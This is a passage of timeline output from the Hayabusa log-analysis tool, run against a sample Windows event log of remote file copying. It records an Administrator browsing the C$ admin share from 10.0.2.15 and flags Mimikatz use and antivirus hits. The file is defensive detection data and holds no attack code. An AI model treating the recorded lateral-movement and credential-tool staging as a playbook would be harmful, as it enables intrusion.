10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator.EXAMPLE\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\.ssh : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\New folder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\RDPWrap-v1.6.2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\translations : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\garbage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x32\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\winrar-cve : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 